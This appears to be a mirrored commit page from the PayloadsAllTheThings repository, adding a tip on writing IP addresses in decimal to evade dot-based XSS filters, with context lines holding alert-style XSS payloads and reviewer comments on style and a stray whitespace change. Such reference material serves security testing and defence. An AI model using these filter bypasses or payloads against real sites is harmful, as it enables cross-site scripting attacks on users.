mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Merge pull request #86 from JLLeitschuh/patch-1
Add XSS dot filter bypass with decimal IP
commit
c6824e7aa9
1 changed files with 4 additions and 1 deletions
|
@ -557,6 +557,9 @@ You can bypass a single quote with ' in an on mousedown event handler
|
||||||
<script>window['alert'](document['domain'])</script>
|
<script>window['alert'](document['domain'])</script>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777`
|
||||||
|
http://www.geektools.com/cgi-bin/ipconv.cgi
|
||||||
|
|
||||||
### Bypass parenthesis for string
|
### Bypass parenthesis for string
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
|
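Review bot: the two lines added after the closing code fence (`Convert IP address into decimal format: IE. ...` and the bare `http://www.geektools.com/cgi-bin/ipconv.cgi`) make the entry depend on a third-party plain-http CGI page that can disappear, and the bare URL does not follow the `[title](url)` link style used in the reference list at the end of the file. Suggest stating the conversion inline instead, since it is plain arithmetic: 192*256^3 + 168*256^2 + 1*256 + 1 = 3232235777, which matches the example given. "IE." should read "i.e." or "e.g.", and one sentence tying the decimal form to the dot filter named in the commit title (the host is written without any `.` character) would say why the line belongs here. For readers using the page defensively, it would also help to note that a filter or allowlist has to parse and normalize the host rather than match on dotted notation.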
@ -1043,4 +1046,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
|
||||||
- [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/)
|
- [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/)
|
||||||
- [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be)
|
- [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be)
|
||||||
- [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
|
- [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
|
||||||
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
|
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
|
||||||
|
|
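Review bot: in the `-1043,4 +1046,4` hunk the four reference entries read identically on both sides and the line count stays at 4, so the one-line change here looks like a whitespace or end-of-file newline difference that is unrelated to the decimal IP addition. Suggest either dropping it from this patch or mentioning it in the commit message so the history of the reference list stays clean.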